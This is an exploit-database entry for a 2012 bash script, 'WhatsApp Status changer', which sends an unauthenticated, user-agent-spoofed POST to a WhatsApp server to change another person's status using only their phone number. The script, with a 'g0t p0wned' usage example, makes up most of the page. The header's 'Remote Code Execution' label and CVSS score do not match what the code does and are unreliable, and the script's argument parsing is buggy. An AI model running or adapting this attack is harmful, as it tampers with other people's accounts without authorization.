WhatsApp Status changer v0.2 stable

vendor:

by:

Emanuele Gentili and Stefano Fratepietro

8,8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: WhatsApp Status changer v0.2 stable

Affected Version From: WhatsApp/2.6.7

Affected Version To: WhatsApp/2.6.7

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: iPhone_OS/5.0.1

2012

WhatsApp Status changer v0.2 stable

WhatsApp Status changer v0.2 stable is a slim exploit able to change the WhatsApp user status in a remote way. This exploit uses the wget command to send a POST request to the WhatsApp server with the user's country code, mobile number and the desired status text. This exploit is vulnerable to Remote Code Execution.

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in any system operations.

Source

Exploit-DB raw data:

#!/bin/bash
#
# WhatsApp Status changer v0.2 stable
# A slim exploit able to change the WhatsApp
# user status in a remote way.
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
 
show_help(){
  echo ""
  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  echo ""
  echo " --usage    show the exploit Usage"
  echo " --credits  show the exploit Credits"
  echo " --help     show the Help"
  echo ""
  echo " enJoy"
}
 
show_credits(){
  echo ""
  echo " Emanuele Gentili"
  echo " http://www.emanuelegentili.eu"
  echo " eg @ offensive-security.it"
  echo ""
  echo " Stefano Fratepietro"
  echo " http://steve.deftlinux.net"
  echo " stefano @ deftlinux.net"
  echo ""

}
 
show_usage(){
  echo ""
  echo " 2012 (C) WhatsApp-exp.sh - The Whats App Status Changer Exploit"
  echo ""
  echo " usage $0 --countrycode 39 --mobilenum 3931212343 --text g0t p0wned"
  echo ""
  echo " enJoy"
}


# Bash
while [[ $# != 0 ]]; do
    arg_name=$1; shift
    case "$arg_name" in
      --help|-?|-h) show_help; exit 0;;
      --credits) show_credits; exit 0;;
      --usage) show_usage; exit 0;;
      --countrycode) countrycode=$1; shift;;
      --mobilenum) mobilenum=$2; shift;;
      --text) text=$3; shift;;
      *) echo "invalid option: $1"; show_help;exit 1;;
    esac
done
 
[ -z "$countrycode" ] && { show_help; exit 1; }

whatsAppagent="WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/Unknown_(iPhone4,1)"

wget --no-cache --delete-after --quiet --no-check-certificate --user-agent="$whatsAppagent" --post-data="cc=$countrycode&me=$mobilenum&s=$text" https://s.whatsapp.net/client/iphone/u.php

echo ""
echo "[+] Operazione completata."
echo ""